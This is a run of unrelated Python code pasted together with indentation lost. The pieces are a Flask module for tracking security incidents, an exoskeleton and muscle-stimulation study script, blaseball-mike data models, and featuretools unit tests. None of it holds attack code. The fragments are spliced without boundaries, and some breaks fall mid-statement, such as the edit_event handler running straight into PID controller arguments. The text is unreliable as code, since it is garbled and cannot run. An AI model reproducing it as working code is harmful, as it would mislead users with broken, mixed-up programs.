query = query.order_by(Event.prevention_tool.asc())
elif session['event_sort_by'] == 'remediation':
if session['event_sort_dir']:
query = query.order_by(Event.remediation.desc())
else:
query = query.order_by(Event.remediation.asc())
elif session['event_sort_by'] == 'status':
if session['event_sort_dir']:
query = query.order_by(Event.status.desc())
else:
query = query.order_by(Event.status.asc())
elif session['event_sort_by'] == 'risk_level':
if session['event_sort_dir']:
query = query.order_by(Event.risk_level.desc())
else:
query = query.order_by(Event.risk_level.asc())
events = query.all()
if session['event_sort_by'] == 'disposition':
events = sorted(events, key=lambda event: event.disposition_rank, reverse=session['event_sort_dir'])
event_tags = {}
# we don't show "special" or "hidden" tags in the display
special_tag_names = [tag for tag in saq.CONFIG['tags'].keys() if saq.CONFIG['tags'][tag] in ['special', 'hidden' ]]
for event in events:
event_tags[event.id] = []
for tag in event.sorted_tags:
if tag.name not in special_tag_names:
event_tags[event.id].append(tag)
return render_template('analysis/events.html', events=events, event_tags=event_tags, filter_state=filter_state, malware=malware, companies=companies, campaigns=campaigns, sort_by=session['event_sort_by'], sort_dir=session['event_sort_dir'])
@analysis.route('/event_alerts', methods=['GET'])
@login_required
def event_alerts():
event_id = request.args['event_id']
events = db.session.query(Event).filter(Event.id == event_id).all()
event = events[0]
event_mappings = db.session.query(EventMapping).filter(EventMapping.event_id == event_id).all()
alert_tags = {}
special_tag_names = [tag for tag in saq.CONFIG['tags'].keys() if saq.CONFIG['tags'][tag] in ['special', 'hidden' ]]
for event_mapping in event_mappings:
alert_tags[event_mapping.alert.uuid] = []
for tag in event_mapping.alert.sorted_tags:
if tag.name not in special_tag_names:
alert_tags[event_mapping.alert.uuid].append(tag)
return render_template('analysis/event_alerts.html', alert_tags=alert_tags, event_mappings=event_mappings, event=event)
@analysis.route('/remove_alerts', methods=['POST'])
@login_required
def remove_alerts():
# get list of event mappings to delete
mappings = request.form['event_mappings'].split(',')
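# each entry is "<event_id>_<alert_id>", e.g. a (hypothetical) form value of
# "3_17,3_18" removes alerts 17 and 18 from event 3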
# connect to db
with get_db_connection() as db:
c = db.cursor()
# delete all mappings
for mapping in mappings:
event_id, alert_id = mapping.split("_")
c.execute("""DELETE FROM event_mapping WHERE event_id=%s AND alert_id=%s""", (event_id, alert_id))
# commit changes to database
db.commit()
# return to events page
return redirect(url_for('analysis.events'))
@analysis.route('/edit_event_modal', methods=['GET'])
@login_required
def edit_event_modal():
event_id = request.args['event_id']
events = db.session.query(Event).filter(Event.id == event_id).all()
event = events[0]
malware = db.session.query(Malware).order_by(Malware.name.asc()).all()
campaigns = db.session.query(Campaign).order_by(Campaign.name.asc()).all()
return render_template('analysis/event_edit.html', event=event, malware=malware, campaigns=campaigns)
@analysis.route('/edit_event', methods=['POST'])
@login_required
def edit_event():
event_id = request.form.get('event_id', None)
event_type = request.form.get('event_type', None)
event_vector = request.form.get('event_vector', None)
event_risk_level = request.form.get('event_risk_level', None)
event_prevention = request.form.get('event_prevention', None)
event_comment = request.form.get('event_comment', None)
event_status = request.form.get('event_status', None)
event_remediation = request.form.get('event_remediation', None)
event_disposition = request.form.get('event_disposition', None)
threats = request.form.getlist('threats', None)
campaign_id = request.form.get('campaign_id', None)
new_campaign = request.form.get('new_campaign', None)
with get_db_connection() as db:
c = db.cursor()
if campaign_id == "NEW":
    c.execute("""SELECT id FROM campaign WHERE name = %s""", (new_campaign,))
if c.rowcount > 0:
result = c.fetchone()
freq=1, min=PID_EXO_minOut, max=PID_EXO_maxOut)
PID_EXO.target = target_arr[target_index]
# unpacking PID profile for clarity
PID_EXO_frequency = PID_EXO_FLEX_profiles[target_index][5]
brake_offset = PID_EXO_FLEX_profiles[target_index][6]
error_margin_EXO = PID_EXO_FLEX_profiles[target_index][7]
brake_target = target_arr[target_index - brake_offset] - error_margin_EXO
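# brake early: aim at an entry brake_offset steps back in target_arr, shrunk
# by the error margin, so the joint can lock before the real target is reached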
print(PID_EXO.target)
print(brake_target)
time.sleep(1)
input("Curl fingers.")
exo_lock()
input("When at 0, press any key to zero angle.")
# input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
exo_unlock()
input("Ready?")
time.sleep(random.uniform(1, 4))
post_lock_timer = 5000
post_lock_ems = 0
pulse_width_tmp = 0
# Reset timer for first run
time_initial = time.time()
time_lastEMS = 0
# Continues to record after target reached for "post_lock_timer" increments
while post_lock_timer != 0:
# read filtered delta angle
angle = moving_avg(read_angle())
output = PID_EXO.step(angle)
time_now = time.time() - time_initial # in seconds
# angular_velocity = get_angular_velocity(angle, time_now)
# print(angular_velocity)
if angle < brake_target and brake_state == 0: # or angle > target + error_margin:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
# print(time_now - time_lastEMS)
time_lastEMS = time_now
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 1,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
ems.send_signal()
# else:
# print("Sending EMS...")
else: # Target reached
if post_lock_ems != 0:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
time_lastEMS = time_now
post_lock_ems = post_lock_ems - 1
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 1,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
# ems.send_signal()
# else:
# print("Sending EMS...")
if brake_state == 0: # lock joint once
exo_lock()
# Start timer
post_lock_timer = post_lock_timer - 1
# Log data to csv
with open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a') as file:
    time_log = time.time() - time_initial
    file.write(str(time_log) + "," + str(angle) + "," + str(target_arr[target_index]) + "," + str(output) + "," + str(pulse_width_tmp) + "," + str(brake_state * brake_target) + "\n")
print("angle: " + str("{0:.2f}".format(angle)) + " PID output: " + str("{0:.2f}".format(output)) + " pulse width: " + str(pulse_width_tmp) + " brake_state: " + str(brake_state) + " timer: " + str(post_lock_timer))
if (show_plot):
# need a pause or else the plot crashes
plt.pause(0.01)
plt.draw()
# Stop study
study_mode = 0
print("DONE!")
# exo condition
elif study_mode == 3:
# Unlock joint ring mcp
exo_unlock()
# EMS config - flexor
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = 300,
intensity = ems_intensity_flex,
)
# Setting logging
with open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a') as file:
    file.write("time,angle,target,output,pulse_width,brake_state\n")
# init PID controller
PID_EXO = PIDController(P=PID_EXO_EXT_profiles[target_index][0], I=PID_EXO_EXT_profiles[target_index][1], D=PID_EXO_EXT_profiles[target_index][2],
freq=1, min=PID_EXO_EXT_profiles[target_index][3], max=PID_EXO_EXT_profiles[target_index][4])
#PID_EXO = PIDController(P=PID_EXO_P, I=PID_EXO_I, D=PID_EXO_D, freq=1, min=PID_EXO_minOut, max=PID_EXO_maxOut)
PID_EXO.target = target_arr[target_index]
# unpacking PID profile for clarity
PID_EXO_frequency = PID_EXO_EXT_profiles[target_index][5]
brake_offset = PID_EXO_EXT_profiles[target_index][6]
error_margin_EXO = PID_EXO_EXT_profiles[target_index][7]
brake_target = target_arr[target_index-brake_offset] - error_margin_EXO
print(PID_EXO.target)
print(brake_target)
time.sleep(1)
input("Curl fingers.")
exo_lock()
input("When at 0, press any key to zero angle.")
# input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
exo_unlock()
input("Ready?")
time.sleep(random.uniform(1, 4))
post_lock_timer = 5000
post_lock_ems = 0
pulse_width_tmp = 0
# Reset timer for first run
time_initial = time.time()
time_lastEMS = 0
# Continues to record after target reached for "post_lock_timer" increments
while post_lock_timer != 0:
# read filtered delta angle
angle = moving_avg(read_angle())
output = PID_EXO.step(angle)
time_now = time.time() - time_initial # in seconds
# angular_velocity = get_angular_velocity(angle, time_now)
# print(angular_velocity)
if angle > brake_target and brake_state == 0: # or angle > target + error_margin:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
# print(time_now - time_lastEMS)
time_lastEMS = time_now
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
ems.send_signal()
# else:
# print("Sending EMS...")
else: # Target reached
if post_lock_ems != 0:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
time_lastEMS = time_now
post_lock_ems = post_lock_ems - 1
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
# ems.send_signal()
# else:
# print("Sending EMS...")
if brake_state == 0: # lock joint once
exo_lock()
# Start timer
post_lock_timer = post_lock_timer - 1
# Log data to csv
with open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a') as file:
    time_log = time.time() - time_initial
    file.write(str(time_log) + "," + str(angle) + "," + str(target_arr[target_index]) + "," + str(output) + "," + str(pulse_width_tmp) + "," + str(brake_state * brake_target) + "\n")
print("angle: " + str("{0:.2f}".format(angle)) + " PID output: " + str("{0:.2f}".format(output)) + " pulse width: " + str(pulse_width_tmp) + " brake_state: " + str(brake_state) + " timer: " + str(post_lock_timer))
if (show_plot):
# need a pause or else the plot crashes
plt.pause(0.01)
plt.draw()
# Stop study
study_mode = 0
print("DONE!")
# read sensor continuously
elif study_mode == 4:
time_output = 0
input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
while True:
time_now = time.time() # in seconds
# update at 30 Hz
if (time_now - time_output > 1 / 30):
angle = moving_avg(read_angle())
print("angle: " + str("{0:.2f}".format(angle))
+ " finger: " + str("{0:.2f}".format(finger_bank))
+ " hand: " + str("{0:.2f}".format(hand_bank)))
if (debug_opti):
# print(str("{0:.2f}".format(hand_attitude)) + " " + str("{0:.2f}".format(hand_heading)) + " "
# + str("{0:.2f}".format(hand_bank))
# + " -- "
# + str("{0:.2f}".format(finger_attitude)) + " " + str("{0:.2f}".format(finger_heading)) + " "
# + str("{0:.2f}".format(finger_bank)) )
# attitude = finger_attitude - hand_attitude
# heading = finger_heading - hand_heading
# bank = finger_bank - hand_bank
# out = math.sqrt( math.pow(attitude,2) + math.pow(heading,2) + math.pow(bank,2))
# print(out)
print(str("{0:.2f}".format(t_attitude)) + " " + str("{0:.2f}".format(t_heading)) + " "
+ str("{0:.2f}".format(t_bank)))
time_output = time.time()
# ard_angle.close()
study_mode = 0
else:
print("Wrong input, please select again... Input is " + study_mode)
study_mode = 0
# Animate plot
def animate(i, xs, ys):
# generate random values to show
#sensor_value = np.random.random()
global angle
sensor_value = angle
# Add x and y to lists
xs.append(datetime.now().strftime('%M:%S.%f'))
ys.append(sensor_value)
# Limit x and y lists to 20 items
xs = xs[-20:]
ys = ys[-20:]
# Draw x and y lists
ax.clear()
ax.plot(xs, ys)
# Format plot
plt.xticks(rotation=45, ha='right')
plt.subplots_adjust(bottom=0.30)
plt.title('sensor value')
plt.ylabel('unit')
# Angle functions
def read_angle():
global prev_angle
# if no physical inputs, use random values
if opti_connected == True:
hand_bank_zeroed = hand_bank - hand_bank_off
finger_bank_zeroed = finger_bank - finger_bank_off
angle = - finger_bank_zeroed + hand_bank_zeroed
else:
# angle = np.random.random() * 10 + target - 9 #always hovering above target
if prev_angle < target - 5:
# climbing from 0 to target
angle = prev_angle + np.random.random() * 0.2
else:
# stabilizing around target
angle = np.random.random() * 2 - 1 + target
prev_angle = angle
return angle
def setOffset():
global finger_bank_off, hand_bank_off
if (opti_connected):
finger_bank_off = finger_bank
hand_bank_off = hand_bank
def get_angular_velocity(current_angle, current_angle_time):
global prev_angle
global prev_angle_time
try:
angular_velocity = (current_angle - prev_angle) / (current_angle_time - prev_angle_time)
except ZeroDivisionError:
angular_velocity = 0
# print(str(current_angle) + " --- " + str(current_angle - prev_angle) + " " + str(current_angle_time - prev_angle_time) + " = " + str(angular_velocity))
# prev_angle = current_angle
prev_angle_time = current_angle_time
return angular_velocity
def moving_avg(input): # moving average filter
global angle_array
global moving_avg_counter
angle_array.pop(0) # remove first element
angle_array.append(input) # add input to last element
# ignore first values to initialize array
if moving_avg_counter != 0:
moving_avg_counter -= 1
if debug_filter:
print ("Modified list is : " + str(angle_array) + " output " + str(input))
return input
else:
    output = 0
    for x in angle_array:
        output += x
    # average of the window (tail reconstructed; truncated in the source)
    return output / len(angle_array)
# repo: everlastingwonder/blaseball-mike
"""For deserializing the json responses"""
import abc
import math
import random
from collections import OrderedDict
import re
from dateutil.parser import parse
from blaseball_mike import database, reference, tables
class Base(abc.ABC):
_camel_to_snake_re = re.compile(r'(?<!^)(?=[A-Z])')
def __init__(self, data):
self.fields = []
for key, value in data.items():
self.fields.append(key)
setattr(self, Base._camel_to_snake(key), value)
@staticmethod
def _camel_to_snake(name):
return Base._camel_to_snake_re.sub('_', name).lower()
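# e.g. _camel_to_snake("nextPhaseTime") -> "next_phase_time"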
def json(self):
return {
f: getattr(self, self._camel_to_snake(f)) for f in self.fields
}
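# json() round-trips the constructor: self.fields keeps the original camelCase
# keys, so each snake_case attribute maps back to its source name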
class GlobalEvent(Base):
@classmethod
def load(cls):
events = database.get_global_events()
return [cls(event) for event in events]
class SimulationData(Base):
@classmethod
def load(cls):
return cls(database.get_simulation_data())
@property
def league(self):
if self._league:
return self._league
self._league = League.load_by_id(self._league_id)
return self._league
@league.setter
def league(self, value):
self._league = None
self._league_id = value
@property
def next_election_end(self):
return self._next_election_end
@next_election_end.setter
def next_election_end(self, value):
self._next_election_end = parse(value)
@property
def next_phase_time(self):
return self._next_phase_time
@next_phase_time.setter
def next_phase_time(self, value):
self._next_phase_time = parse(value)
@property
def next_season_start(self):
return self._next_season_start
@next_season_start.setter
def next_season_start(self, value):
self._next_season_start = parse(value)
class Player(Base):
@classmethod
def load(cls, *ids):
"""
Load dictionary of players
"""
players = database.get_player(list(ids))
return {
id_: cls(player) for (id_, player) in players.items()
}
@classmethod
def load_one(cls, id_):
"""
Load single player.
"""
return cls.load(id_).get(id_)
@classmethod
def find_by_name(cls, name):
"""
Try to find the player by their name (case sensitive) or return None.
"""
ids = reference.get_player_ids_by_name(name)
if not ids:
return None
return cls.load_one(ids[0])
@property
def hitting_rating(self):
if getattr(self, "_hitting_rating", None):
return self._hitting_rating
return (((1 - self.tragicness) ** 0.01) * ((1 - self.patheticism) ** 0.05) *
((self.thwackability * self.divinity) ** 0.35) *
((self.moxie * self.musclitude) ** 0.075) * (self.martyrdom ** 0.02))
@hitting_rating.setter
def hitting_rating(self, value):
self._hitting_rating = value
@property
def batting_rating(self):
return self.hitting_rating
@property
def pitching_rating(self):
if getattr(self, "_pitching_rating", None):
return self._pitching_rating
return ((self.unthwackability ** 0.5) * (self.ruthlessness ** 0.4) *
(self.overpowerment ** 0.15) * (self.shakespearianism ** 0.1) * (self.coldness ** 0.025))
@pitching_rating.setter
def pitching_rating(self, value):
self._pitching_rating = value
@property
def baserunning_rating(self):
if getattr(self, "_baserunning_rating", None):
return self._baserunning_rating
return ((self.laserlikeness**0.5) *
((self.continuation * self.base_thirst * self.indulgence * self.ground_friction) ** 0.1))
@baserunning_rating.setter
def baserunning_rating(self, value):
self._baserunning_rating = value
@property
def defense_rating(self):
if getattr(self, "_defense_rating", None):
return self._defense_rating
return (((self.omniscience * self.tenaciousness) ** 0.2) *
((self.watchfulness * self.anticapitalism * self.chasiness) ** 0.1))
@defense_rating.setter
def defense_rating(self, value):
self._defense_rating = value
@staticmethod
def _rating_to_stars(val):
return 0.5 * (round(val * 10))
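# e.g. a 0.73 rating: round(7.3) = 7, so 3.5 stars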
@property
def hitting_stars(self):
return self._rating_to_stars(self.hitting_rating)
@property
def batting_stars(self):
return self.hitting_stars
@property
def pitching_stars(self):
return self._rating_to_stars(self.pitching_rating)
@property
def baserunning_stars(self):
return self._rating_to_stars(self.baserunning_rating)
@property
def defense_stars(self):
return self._rating_to_stars(self.defense_rating)
def get_vibe(self, day):
"""
Day is 1-indexed
"""
return 0.5 * ((self.pressurization + self.cinnamon) *
math.sin(math.pi * (2 / (6 + round(10 * self.buoyancy)) * (day - 1) + 0.5)) -
self.pressurization + self.cinnamon)
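# On day 1 the sine term is sin(pi/2) = 1 and the vibe reduces to exactly
# cinnamon; it then oscillates with a period of 6 + round(10 * buoyancy) days.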
@property
def soulscream(self):
letters = ["A", "E", "I", "O", "U", "X", "H", "A", "E", "I"]
stats = [self.pressurization, self.divinity, self.tragicness, self.shakespearianism, self.ruthlessness]
scream = []
for r in range(self.soul):
sub_scream = []
i = 10 ** -r
for s in stats:
try:
c = math.floor((s % i) / i * 10)
sub_scream.append(letters[c])
except ZeroDivisionError:
sub_scream.append("undefined")
scream.extend(sub_scream + sub_scream + [sub_scream[0]])
return ''.join(scream)
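# Each round r reads successively finer decimal digits of the five stats
# (i = 10**-r, so floor((s % i) / i * 10) is digit r+1 after the point),
# maps them to vowels, and sings each sub-scream twice plus its first letter.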
@property
def blood(self):
return tables.Blood(self._blood)
@blood.setter
def blood(self, value):
self._blood = value
@property
def coffee(self):
return tables.Coffee(self._coffee)
@coffee.setter
def coffee(self, value):
self._coffee = value
@property
def bat(self):
return tables.Item(self._bat)
@bat.setter
def bat(self, value):
self._bat = value
@property
def armor(self):
return tables.Item(self._armor)
@armor.setter
def armor(self, value):
self._armor = value
@property
def perm_attr(self):
return [tables.Modification(attr) for attr in self._perm_attr]
@perm_attr.setter
def perm_attr(self, value):
self._perm_attr = value
@property
def seas_attr(self):
return [tables.Modification(attr) for attr in self._seas_attr]
@seas_attr.setter
def seas_attr(self, value):
self._seas_attr = value
@property
def week_attr(self):
return [tables.Modification(attr) for attr in self._week_attr]
@week_attr.setter
def week_attr(self, value):
self._week_attr = value
@property
def game_attr(self):
return [tables.Modification(attr) for attr in self._game_attr]
@game_attr.setter
def game_attr(self, value):
self._game_attr = value
def simulated_copy(self, overrides=None, multipliers=None, buffs=None, reroll=None):
"""
Return a copy of this player with adjusted stats (ie to simulate blessings)
`overrides` is a dict where the key specifies an attribute to completely overwrite with new value.
`multipliers` is a dict where key specifies attr to multiply by value
`buffs` is a dict where key specifies attr to add value
`reroll` is a dict where the key specifies attr to reroll (value is unused)
`batting_rating`, `pitching_rating`, `baserunning_rating`, `defense_rating`, and `overall_rating`
can additionally be passed to `multipliers` and `buffs` to automatically multiply the appropriate
related stats.
"""
overrides = overrides or {}
multipliers = multipliers or {}
buffs = buffs or {}
reroll = reroll or {}
original_json = self.json()
for override_key, override_value in overrides.items():
original_json[override_key] = override_value
for m_key, m_val in multipliers.items():
if m_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] *= (1.0 - m_val)
original_json['patheticism'] *= (1.0 - m_val)
original_json['thwackability'] *= (1.0 + m_val)
original_json['divinity'] *= (1.0 + m_val)
original_json['moxie'] *= (1.0 + m_val)
original_json['musclitude'] *= (1.0 + m_val)
original_json['martyrdom'] *= (1.0 + m_val)
if m_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] *= (1.0 + m_val)
original_json['ruthlessness'] *= (1.0 + m_val)
original_json['overpowerment'] *= (1.0 + m_val)
original_json['shakespearianism'] *= (1.0 + m_val)
original_json['coldness'] *= (1.0 + m_val)
if m_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] *= (1.0 + m_val)
original_json['continuation'] *= (1.0 + m_val)
original_json['baseThirst'] *= (1.0 + m_val)
original_json['indulgence'] *= (1.0 + m_val)
original_json['groundFriction'] *= (1.0 + m_val)
if m_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] *= (1.0 + m_val)
original_json['tenaciousness'] *= (1.0 + m_val)
original_json['watchfulness'] *= (1.0 + m_val)
original_json['anticapitalism'] *= (1.0 + m_val)
original_json['chasiness'] *= (1.0 + m_val)
if m_key in ('tragicness', 'patheticism'):
original_json[m_key] *= (1.0 - m_val)
elif m_key in original_json:
original_json[m_key] *= (1.0 + m_val)
for b_key, b_val in buffs.items():
if b_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] = min(0.99, max(0.01, original_json['tragicness'] - b_val))
original_json['patheticism'] = min(0.99, original_json['patheticism'] - b_val)
original_json['thwackability'] = max(0.01, original_json['thwackability'] + b_val)
original_json['divinity'] = max(0.01, original_json['divinity'] + b_val)
original_json['moxie'] = max(0.01, original_json['moxie'] + b_val)
original_json['musclitude'] = max(0.01, original_json['musclitude'] + b_val)
original_json['martyrdom'] = max(0.01, original_json['martyrdom'] + b_val)
if b_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] = max(0.01, original_json['unthwackability'] + b_val)
original_json['ruthlessness'] = max(0.01, original_json['ruthlessness'] + b_val)
original_json['overpowerment'] = max(0.01, original_json['overpowerment'] + b_val)
original_json['shakespearianism'] = max(0.01, original_json['shakespearianism'] + b_val)
original_json['coldness'] = max(0.01, original_json['coldness'] + b_val)
if b_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] = max(0.01, original_json['laserlikeness'] + b_val)
original_json['continuation'] = max(0.01, original_json['continuation'] + b_val)
original_json['baseThirst'] = max(0.01, original_json['baseThirst'] + b_val)
original_json['indulgence'] = max(0.01, original_json['indulgence'] + b_val)
original_json['groundFriction'] = max(0.01, original_json['groundFriction'] + b_val)
if b_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] = max(0.01, original_json['omniscience'] + b_val)
original_json['tenaciousness'] = max(0.01, original_json['tenaciousness'] + b_val)
original_json['watchfulness'] = max(0.01, original_json['watchfulness'] + b_val)
original_json['anticapitalism'] = max(0.01, original_json['anticapitalism'] + b_val)
original_json['chasiness'] = max(0.01, original_json['chasiness'] + b_val)
if b_key in ('tragicness', 'patheticism'):
original_json[b_key] = min(0.99, max(0.01, original_json[b_key] - b_val))
elif b_key in original_json:
original_json[b_key] = max(0.01, original_json[b_key] + b_val)
for r_key, _ in reroll.items():
if r_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] = random.uniform(0.01, 0.99)
original_json['patheticism'] = random.uniform(0.01, 0.99)
original_json['thwackability'] = random.uniform(0.01, 0.99)
original_json['divinity'] = random.uniform(0.01, 0.99)
original_json['moxie'] = random.uniform(0.01, 0.99)
original_json['musclitude'] = random.uniform(0.01, 0.99)
original_json['martyrdom'] = random.uniform(0.01, 0.99)
if r_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] = random.uniform(0.01, 0.99)
original_json['ruthlessness'] = random.uniform(0.01, 0.99)
original_json['overpowerment'] = random.uniform(0.01, 0.99)
original_json['shakespearianism'] = random.uniform(0.01, 0.99)
original_json['coldness'] = random.uniform(0.01, 0.99)
if r_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] = random.uniform(0.01, 0.99)
original_json['continuation'] = random.uniform(0.01, 0.99)
original_json['baseThirst'] = random.uniform(0.01, 0.99)
original_json['indulgence'] = random.uniform(0.01, 0.99)
original_json['groundFriction'] = random.uniform(0.01, 0.99)
if r_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] = random.uniform(0.01, 0.99)
original_json['tenaciousness'] = random.uniform(0.01, 0.99)
original_json['watchfulness'] = random.uniform(0.01, 0.99)
original_json['anticapitalism'] = random.uniform(0.01, 0.99)
original_json['chasiness'] = random.uniform(0.01, 0.99)
if r_key in ('tragicness', 'patheticism'):
original_json[r_key] = random.uniform(0.01, 0.99)
elif r_key in original_json:
original_json[r_key] = random.uniform(0.01, 0.99)
return Player(original_json)
class Team(Base):
@classmethod
def load(cls, id_):
return cls(database.get_team(id_))
@classmethod
def load_all(cls):
"""
Returns dictionary keyed by team ID
"""
return {
id_: cls(team) for id_, team in database.get_all_teams().items()
}
@classmethod
def load_by_name(cls, name):
"""
Name can be full name or nickname, case insensitive.
"""
teams = cls.load_all().values()
name = name.lower()
for team in teams:
if name in team.full_name.lower():
return team
return None
@property
def lineup(self):
if self._lineup:
return self._lineup
players = Player.load(*self._lineup_ids)
self._lineup = [players.get(id_) for id_ in self._lineup_ids]
return self._lineup
@lineup.setter
def lineup(self, value):
self._lineup = None
self._lineup_ids = value
@property
def rotation(self):
if self._rotation:
return self._rotation
players = Player.load(*self._rotation_ids)
self._rotation = [players.get(id_) for id_ in self._rotation_ids]
return self._rotation
2, 3])
df = to_pandas(df, index='id', sort_index=True)
for i, test in enumerate(to_test[:-1]):
v = df[features[i].get_name()].tolist()
assert v == test[1]
i, test = -1, to_test[-1]
v = df[features[i].get_name()].tolist()
assert (np.isnan(v[0]))
assert v[1:] == test[1][1:]
def test_arithmetic_of_direct(es):
rating = ft.Feature(es['products'].ww['rating'])
log_rating = ft.Feature(rating, 'log')
customer_age = ft.Feature(es['customers'].ww['age'])
session_age = ft.Feature(customer_age, 'sessions')
log_age = ft.Feature(session_age, 'log')
to_test = [(AddNumeric, [38, 37, 37.5, 37.5]),
(SubtractNumeric, [28, 29, 28.5, 28.5]),
(MultiplyNumeric, [165, 132, 148.5, 148.5]),
(DivideNumeric, [6.6, 8.25, 22. / 3, 22. / 3])]
if es.dataframe_type == Library.KOALAS.value:
to_test = to_test[:1] + to_test[2:]
features = []
for test in to_test:
features.append(ft.Feature([log_age, log_rating], primitive=test[0]))
df = ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=[0, 3, 5, 7])
df = to_pandas(df, index='id', sort_index=True)
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert v == test[1]
# Koalas EntitySets do not support boolean multiplication
@pytest.fixture(params=['pd_boolean_mult_es', 'dask_boolean_mult_es'])
def boolean_mult_es(request):
return request.getfixturevalue(request.param)
@pytest.fixture
def pd_boolean_mult_es():
es = ft.EntitySet()
df = pd.DataFrame({"index": [0, 1, 2],
"bool": pd.Series([True, False, True]),
"numeric": [2, 3, np.nan]})
es.add_dataframe(dataframe_name="test",
dataframe=df,
index="index")
return es
@pytest.fixture
def dask_boolean_mult_es(pd_boolean_mult_es):
dataframes = {}
for df in pd_boolean_mult_es.dataframes:
dataframes[df.ww.name] = (dd.from_pandas(df, npartitions=2), df.ww.index, None, df.ww.logical_types)
return ft.EntitySet(id=pd_boolean_mult_es.id, dataframes=dataframes)
def test_boolean_multiply(boolean_mult_es):
es = boolean_mult_es
to_test = [
('numeric', 'numeric'),
('numeric', 'bool'),
('bool', 'numeric'),
('bool', 'bool')
]
features = []
for row in to_test:
features.append(ft.Feature(es["test"].ww[row[0]]) * ft.Feature(es["test"].ww[row[1]]))
fm = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features))
df = to_pandas(es['test'])
for row in to_test:
col_name = '{} * {}'.format(row[0], row[1])
if row[0] == 'bool' and row[1] == 'bool':
assert fm[col_name].equals((df[row[0]] & df[row[1]]).astype('boolean'))
else:
assert fm[col_name].equals(df[row[0]] * df[row[1]])
# TODO: rework test to be Dask and Koalas compatible
def test_arithmetic_of_transform(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail("Test uses Diff which is not supported in Dask or Koalas")
diff1 = ft.Feature([ft.Feature(es['log'].ww['value'])], primitive=Diff)
diff2 = ft.Feature([ft.Feature(es['log'].ww['value_2'])], primitive=Diff)
to_test = [(AddNumeric, [np.nan, 7., -7., 10.]),
(SubtractNumeric, [np.nan, 3., -3., 4.]),
(MultiplyNumeric, [np.nan, 10., 10., 21.]),
(DivideNumeric, [np.nan, 2.5, 2.5, 2.3333333333333335])]
features = []
for test in to_test:
features.append(ft.Feature([diff1, diff2], primitive=test[0]()))
feature_set = FeatureSet(features)
calculator = FeatureSetCalculator(es, feature_set=feature_set)
df = calculator.run(np.array([0, 2, 12, 13]))
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert np.isnan(v.pop(0))
assert np.isnan(test[1].pop(0))
assert v == test[1]
def test_not_feature(es):
not_feat = ft.Feature(es['customers'].ww['loves_ice_cream'], primitive=Not)
features = [not_feat]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=[0, 1]))
v = df[not_feat.get_name()].values
assert not v[0]
assert v[1]
def test_arithmetic_of_agg(es):
customer_id_feat = ft.Feature(es['customers'].ww['id'])
store_id_feat = ft.Feature(es['stores'].ww['id'])
count_customer = ft.Feature(customer_id_feat, parent_dataframe_name=u'régions', primitive=Count)
count_stores = ft.Feature(store_id_feat, parent_dataframe_name=u'régions', primitive=Count)
to_test = [(AddNumeric, [6, 2]),
(SubtractNumeric, [0, -2]),
(MultiplyNumeric, [9, 0]),
(DivideNumeric, [1, 0])]
# Skip SubtractNumeric for Koalas as it's unsupported
if es.dataframe_type == Library.KOALAS.value:
to_test = to_test[:1] + to_test[2:]
features = []
for test in to_test:
features.append(ft.Feature([count_customer, count_stores], primitive=test[0]()))
ids = ['United States', 'Mexico']
df = ft.calculate_feature_matrix(entityset=es, features=features,
instance_ids=ids)
df = to_pandas(df, index='id', sort_index=True)
df = df.loc[ids]
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert v == test[1]
def test_latlong(pd_es):
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
latitude = ft.Feature(log_latlong_feat, primitive=Latitude)
longitude = ft.Feature(log_latlong_feat, primitive=Longitude)
features = [latitude, longitude]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features, instance_ids=range(15))
latvalues = df[latitude.get_name()].values
lonvalues = df[longitude.get_name()].values
assert len(latvalues) == 15
assert len(lonvalues) == 15
real_lats = [0, 5, 10, 15, 20, 0, 1, 2, 3, 0, 0, 5, 0, 7, 14]
real_lons = [0, 2, 4, 6, 8, 0, 1, 2, 3, 0, 0, 2, 0, 3, 6]
